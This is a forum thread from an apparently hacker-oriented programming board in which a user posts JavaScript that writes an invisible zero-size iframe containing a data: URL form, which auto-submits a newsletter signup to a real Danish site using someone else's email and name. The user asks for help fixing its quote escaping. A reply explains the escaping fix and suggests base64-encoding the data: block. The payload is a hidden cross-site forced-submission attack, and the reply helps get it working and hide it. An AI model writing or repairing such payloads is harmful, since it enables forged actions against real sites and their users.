Problem with js code

Talk about any languages right here. Share and discuss source, but don't expect your homework to be done for you.

Problem with js code

Postby privateloader » Fri Aug 26, 2016 9:10 am

Hi hope you doing well,

I know that you have mad skills in coding and i wonder if you could make this code to work.
Code: Select all
<script> document.write('<iframe src=\"data:text/html;charset=utf-8,<form method="post" name="subscribeform" action="http://www.nkk.dk/nyhedsbrev/?p=subscribe"><input type="hidden" name="formtoken" value="9cf80e7901984c446df7aac12696c288"><input type="hidden" name="email" value="emailtest@gmail.com"><input type="hidden" name="htmlemail" value="1"><input type="hidden" name="attribute7" value="Joaquim"><input type="hidden" name="attribute6" value="Broodly"><input type="hidden" name="rssfrequency" value="daily"><input type="hidden" name="list[3]" value="signup"><input type="hidden" name="listname[3]" value="Updates fra nkk.dk"><input type="hidden" name="list[2]" value="signup"><input type="hidden" name="listname[2]" value="NKK Info"><input type="hidden" name="VerificationCodeX" value=""><input type="submit" name="subscribe" value="subscribe"></form><script>document.forms[0]["subscribe"].click();</script>\" frameborder=\"0\" heigth=\"0\" width=\"0\"></iframe>'); </script>
The exact problem is with \" which makes the code invalid. (This is an interpretor like ' or "), i have tried several times without success even post online for help but no one was able to fix it. The code between data://... ...</form> works perfectly. Just use in the address bar.

When running this page the part that seems to break the js code is
Code: Select all
\" frameborder=\"0\" heigth=\"0\" width=\"0\"></iframe>');
Thanks
privateloader
Strike 1
 
Posts: 38
Joined: Fri Aug 22, 2014 5:50 am

Re: Problem with js code

Postby Cool_Fire » Wed Aug 31, 2016 12:30 am

I think you should be escaping the double quotes inside the data: section, not those outside it. The ones outside it are in a ' quoted string and don't need escaping. But your data: stream is inside " quotes so any extra " quotes do need escaping.

A quick way to cheat having to do any escaping at all would be to just use a different encoding for your data: block. You can base64 encode data: blocks for example.
Code: Select all
src="data:text/html;base64,f0O...B4r="
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.
User avatar
Cool_Fire
Not a sandwich
 
Posts: 1880
Joined: Fri May 09, 2003 1:20 pm
ICQ: 336613081
Website: https://www.insomnia247.nl/
Yahoo Messenger: cool_fire_666
AOL: EvilCoolFire
Location: 41 6d 73 74 65 72 64 61 6d


Return to ā€œ%sā€ Programming

Who is online

Users browsing this forum: No registered users and 0 guests

cron